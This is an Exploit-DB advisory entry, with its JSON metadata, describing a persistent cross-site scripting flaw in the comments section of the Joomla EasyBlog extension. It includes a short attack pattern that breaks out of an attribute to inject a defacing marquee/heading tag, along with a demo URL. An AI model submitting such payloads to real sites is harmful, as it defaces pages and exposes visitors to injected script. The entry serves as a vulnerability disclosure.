ID : EDB-ID:14336
Type : exploitdb
Reporter : Sid3^effects
Modified : 2010-07-12T00:00:00
Description
Joomla EasyBlog Persistent XSS Vulnerability. Webapps exploit for php platform
Name : Joomla EasyBlog Persistent XSS Vulnerability
Date : July 12, 2010
Critical Level : HIGH
Vendor URL : http://stackideas.com/products/easyblog.html
Author : Sid3^effects aKa HaRi
special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,MA1201,KeDar,Sonic,gunslinger_
greetz to :www.topsecure.net ,All ICW members and my friends :) luv y0 guyz
#######################################################################################################
Description
Publishing your blog in Joomla!-based website has never been easier with EasyBlog. Comes with built-in social integrations with Twitter, Facebook Share and Google Buzz, you never, ever have to manually notify your followers for your new blog entries.
#######################################################################################################
Xploit: Persistent XSS Vulnerability
This vulnerability exists in the comments section.
1. Go to any post and submit your evil XSS script in the comment section :P
Attack Pattern:">><marquee><h1>XSS3d by Sid3^effects</h1><marquee>
DEMO URL : http://<site>/easyblog/entry/uncategorized/2010/07/09/testing-umlaut-charaters.html
{"bulletinFamily": "exploit", "id": "EDB-ID:14336", "cvelist": [], "modified": "2010-07-12T00:00:00", "lastseen": "2016-02-01T19:37:40", "edition": 1, "sourceData": "Name : Joomla EasyBlog Persistent XSS Vulnerability\r\nDate : july 12,2010\r\nCritical Level \t: HIGH\r\nvendor URL :http://stackideas.com/products/easyblog.html\r\nAuthor : Sid3^effects aKa HaRi \r\nspecial thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,MA1201,KeDar,Sonic,gunslinger_\r\ngreetz to :www.topsecure.net ,All ICW members and my friends :) luv y0 guyz \r\n#######################################################################################################\r\nDescription \r\nPublishing your blog in Joomla!-based website has never been easier with EasyBlog. Comes with built-in social integrations with Twitter, Facebook Share and Google Buzz, you never, ever have to manually notify your followers for your new blog entries.\r\n#######################################################################################################\r\nXploit: Persistent XSS Vulnerability\r\n\r\nThis vulnerability exists in the comments section.\r\n\r\n1. Goto any post and submit your evil xss script in the comment section :P \r\n\r\nAttack Pattern:\">><marquee><h1>XSS3d by Sid3^effects</h1><marquee> \r\n\r\nDEMO URL : http://<site>/easyblog/entry/uncategorized/2010/07/09/testing-umlaut-charaters.html\r\n", "published": "2010-07-12T00:00:00", "href": "https://www.exploit-db.com/exploits/14336/", "osvdbidlist": [], "reporter": "Sid3^effects", "hash": "cb6748615b9afa31e5c79025fb8948336b6969802bfacb182da4fa2468905622", "title": "Joomla EasyBlog Persistent XSS Vulnerability", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "Joomla EasyBlog Persistent XSS Vulnerability. Webapps exploit for php platform", "references": [], "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/14336/", "enchantments": {"vulnersScore": 6.3}}